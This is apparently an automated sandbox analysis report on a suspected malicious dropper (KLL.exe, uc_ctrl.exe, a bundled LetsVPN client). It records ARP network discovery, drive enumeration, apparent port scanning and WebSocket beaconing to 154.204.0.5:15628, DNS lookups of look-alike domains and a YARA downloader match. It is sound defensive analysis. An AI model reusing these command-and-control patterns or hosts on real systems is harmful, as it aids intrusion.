Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4082995066.0000000030F62000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: vcruntime140.i386.pdb source: uc_ctrl.exe, uc_ctrl.exe, 00000013.00000002.4040392187.0000000073D81000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: vcruntime140.i386.pdbGCTL source: uc_ctrl.exe, 00000013.00000002.4040392187.0000000073D81000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: LetsPRO.exe, 0000003C.00000002.4073144832.00000000301E2000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: msvcp140.i386.pdbGCTL source: uc_ctrl.exe, 00000013.00000002.4039810879.000000006CDC1000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: LetsPRO.exe, 0000003C.00000002.4072724496.00000000301D2000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: tapinstall.exe, 00000023.00000000.2581148490.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2582900585.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.2621289880.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.2583643703.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000039.00000002.2636929891.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000039.00000000.2632218485.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4083133533.0000000030F82000.00000002.00000001.01000000.0000002C.sdmp
Source:	Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdb source: LetsPRO.exe, 0000003C.00000002.4117282589.0000000039F82000.00000002.00000001.01000000.0000003C.sdmp
Source:	Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: LetsPRO.exe, 0000003C.00000002.4063922305.0000000006942000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: msvcp140.i386.pdb source: uc_ctrl.exe, uc_ctrl.exe, 00000013.00000002.4039810879.000000006CDC1000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: LetsPRO.exe, 0000003C.00000002.4083227648.0000000030F92000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: LetsPRO.exe, 0000003C.00000002.4073144832.00000000301E2000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: LetsPRO.exe, 0000003C.00000002.4116789613.0000000039E02000.00000002.00000001.01000000.0000003B.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: LetsPRO.exe, 0000003C.00000002.4083133533.0000000030F82000.00000002.00000001.01000000.0000002C.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: LetsPRO.exe, 0000003C.00000002.4074066016.0000000030482000.00000002.00000001.01000000.00000028.sdmp

Spreading

Performs a network lookup / discovery via ARP

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: z:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: x:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: v:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: t:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: r:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: p:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: n:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: l:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: j:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: h:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: f:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: b:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: y:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: w:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: u:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: s:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: q:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: o:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: m:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: k:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: i:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: g:	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: e:	Jump to behavior
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	File opened: c:
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File opened: [:	Jump to behavior

Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180027938 FindFirstFileExW,	0_2_0000000180027938
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB2E966 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,_wcslen,	19_2_6CB2E966
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDD6810 _Open_dir,FindFirstFileExW,_Read_dir,FindClose,	19_2_6CDD6810

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 154.204.0.5 ports 1,2,15628,5,6,8

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 15628
Source: unknown	Network traffic detected: HTTP traffic on port 15628 -> 49722

Yara detected Generic Downloader

Source: Yara match	File source: C:\Program Files (x86)\letsvpn\app-3.7.0\netstandard.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\letsvpn\Update.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.6:49722 -> 154.204.0.5:15628

Source: global traffic

TCP traffic: 192.168.2.6:49729 -> 8.8.8.8:53

Source: global traffic	HTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: ECfGmCmRKiTGhHoKmDyBQIhCKSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 154.204.0.5:15628
Source: global traffic	HTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: YTJjMDBlYTQtMmY1MC00ZQ==Origin: ws://ws-ap1.pusher.com

Source: Joe Sandbox View	IP Address: 183.60.146.66 183.60.146.66
Source: Joe Sandbox View	IP Address: 103.235.47.188 103.235.47.188
Source: Joe Sandbox View	IP Address: 103.235.47.188 103.235.47.188
Source: Joe Sandbox View	IP Address: 23.98.101.155 23.98.101.155

Source: Joe Sandbox View

ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK

Source: unknown	TCP traffic detected without corresponding DNS query: 154.204.0.5
Source: unknown	TCP traffic detected without corresponding DNS query: 154.204.0.5
Source: unknown	TCP traffic detected without corresponding DNS query: 154.204.0.5
Source: unknown	TCP traffic detected without corresponding DNS query: 154.204.0.5
Source: unknown	TCP traffic detected without corresponding DNS query: 154.204.0.5
Source: unknown	TCP traffic detected without corresponding DNS query: 154.204.0.5
Source: unknown	TCP traffic detected without corresponding DNS query: 154.204.0.5
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 183.60.146.66
Source: unknown	TCP traffic detected without corresponding DNS query: 183.60.146.66
Source: unknown	TCP traffic detected without corresponding DNS query: 183.60.146.66
Source: unknown	TCP traffic detected without corresponding DNS query: 183.60.146.66
Source: unknown	TCP traffic detected without corresponding DNS query: 183.60.146.66
Source: unknown	TCP traffic detected without corresponding DNS query: 183.60.146.66
Source: unknown	TCP traffic detected without corresponding DNS query: 35.227.223.56
Source: unknown	TCP traffic detected without corresponding DNS query: 35.227.223.56
Source: unknown	TCP traffic detected without corresponding DNS query: 35.227.223.56
Source: unknown	TCP traffic detected without corresponding DNS query: 35.227.223.56
Source: unknown	TCP traffic detected without corresponding DNS query: 35.227.223.56
Source: unknown	TCP traffic detected without corresponding DNS query: 35.227.223.56
Source: unknown	TCP traffic detected without corresponding DNS query: 35.227.223.56
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155
Source: unknown	TCP traffic detected without corresponding DNS query: 23.98.101.155

Source: global traffic	HTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: ECfGmCmRKiTGhHoKmDyBQIhCKSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 154.204.0.5:15628
Source: global traffic	HTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: YTJjMDBlYTQtMmY1MC00ZQ==Origin: ws://ws-ap1.pusher.com

Source: LetsPRO.exe, 0000003C.00000002.4151476576.0000000068E49000.00000002.00000001.01000000.00000025.sdmp	String found in binary or memory: os/exec.Command(]. new data: GID[^/app([0-9]+)/app^created by (.+)$bad TinySizeClassbad key algorithmbad local addressboundBindToDevicecannot find id %sclose dns channelconnectingAddresscorkOptionEnableddecryption failedduplicate addresseffectiveNetProtoentersyscallblockexec apiAgent GIDexec apiAgent RIDexec deleteRegDirexec format errorexec nicIndexToIPexec phyNIC Indexexec phyNIC SetIPexec tapIFCE Nameexec: killing Cmdexec: not startedfractional secondframe_ping_lengthg already scannedget up-going ACK glEdgeFlagPointerglPopClientAttribglTexCoordPointergp.waiting != nilhandshake failureif-modified-sinceillegal parameterin string literalindex > windowEndinteger too largeinvalid BMPStringinvalid IA5Stringinvalid bit size invalid stream IDip2if func returnipv6-only networkisConnectNotifiedjoyReleaseCapturekey align too biglocked m0 woke upmark - bad statusmarkBits overflowmciGetCreatorTaskmessage too largemidiInGetDevCapsWmidiOutGetNumDevsmidiStreamRestartmissing closing )missing closing ]missing extensionmixerGetLineInfoWmultipartmaxpartsneed re-resolve: nextId too large:nil resource bodyno available Datano data availablenoChecksumEnablednotetsleepg on g0old node version:operation abortedparameter problempermission deniedpkg/buffer.Bufferpkg/sleep.Sleeperpkg/tcpip.Addresspppoe instanceId:protect fd failedreceiveBufferSizereceiveTOSEnabledreceiveTTLEnabledreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of remoteAddr is nilruntime.newosprocruntime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0seeker can't seekselect (no cases)set sdk loglevel:set tap static ipstack: frame={sp:start map checkerstart refresh infswept cached spansync.RWMutex.Lockthread exhaustiontimeGetSystemTimetransfer-encodingtruncated headersudp routines num:unknown caller pcunknown hostname:unknown type kindunrecognized nameupdate dns dialeruse gid:%s rid:%swait for GC cyclewaveInGetDevCapsWwaveInGetPositionwaveOutGetNumDevswebsocket: close wglGetPixelFormatwglGetProcAddresswglSetPixelFormatwine_get_versionwrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)
Source: LetsPRO.exe, 0000003C.00000002.4151476576.0000000068E49000.00000002.00000001.01000000.00000025.sdmp	String found in binary or memory: wrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: in.appcenter.ms
Source: global traffic	DNS traffic detected: DNS query: ws-ap1.pusher.com
Source: global traffic	DNS traffic detected: DNS query: www.baidu.com
Source: global traffic	DNS traffic detected: DNS query: www.yandex.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: nal.fqoqehwib.com
Source: global traffic	DNS traffic detected: DNS query: nit.crash1ytics.com
Source: global traffic	DNS traffic detected: DNS query: chr.alipayassets.com
Source: global traffic	DNS traffic detected: DNS query: d1dmgcawtbm6l9.cloudfront.net

Source: KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000002.2325355808.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2318433786.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000002.2325355808.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2318433786.00000208768E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: LetsPRO.exe, 0000003C.00000002.4075306765.0000000030932000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4075306765.000000003093E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000001E.00000002.2564049332.00000000026E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000017.00000002.2326792493.00000000030F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro?r
Source: powershell.exe, 0000001E.00000002.2563842250.0000000002666000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4061520880.000000000635A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4020924812.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000002.2325355808.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2318433786.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000002.2325355808.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2318433786.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4061520880.000000000635A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4020924812.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000002.2325355808.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2318433786.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: LetsPRO.exe, 0000003C.00000002.4020924812.00000000015D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: svchost.exe, 0000000D.00000003.2263667963.0000018F99400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: letsvpn-latest.exe, 00000015.00000000.2315917181.000000000040A000.00000008.00000001.01000000.0000000E.sdmp, letsvpn-latest.exe, 00000015.00000003.2637768217.0000000000844000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000002.2674885073.000000000040A000.00000004.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000001E.00000002.2571050198.000000000560D000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000002.2325355808.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2318433786.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: LetsPRO.exe, 0000003C.00000002.4041405229.0000000001B87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sec
Source: KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4061520880.000000000635A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4020924812.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: LetsPRO.exe, 0000003C.00000002.4042371730.00000000037FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer0
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.0000000003521000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.fontawesome.io/icons/
Source: powershell.exe, 0000001E.00000002.2565154970.00000000046F6000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.00000000039AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000017.00000002.2334908469.000000000517C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2565154970.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.0000000003521000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
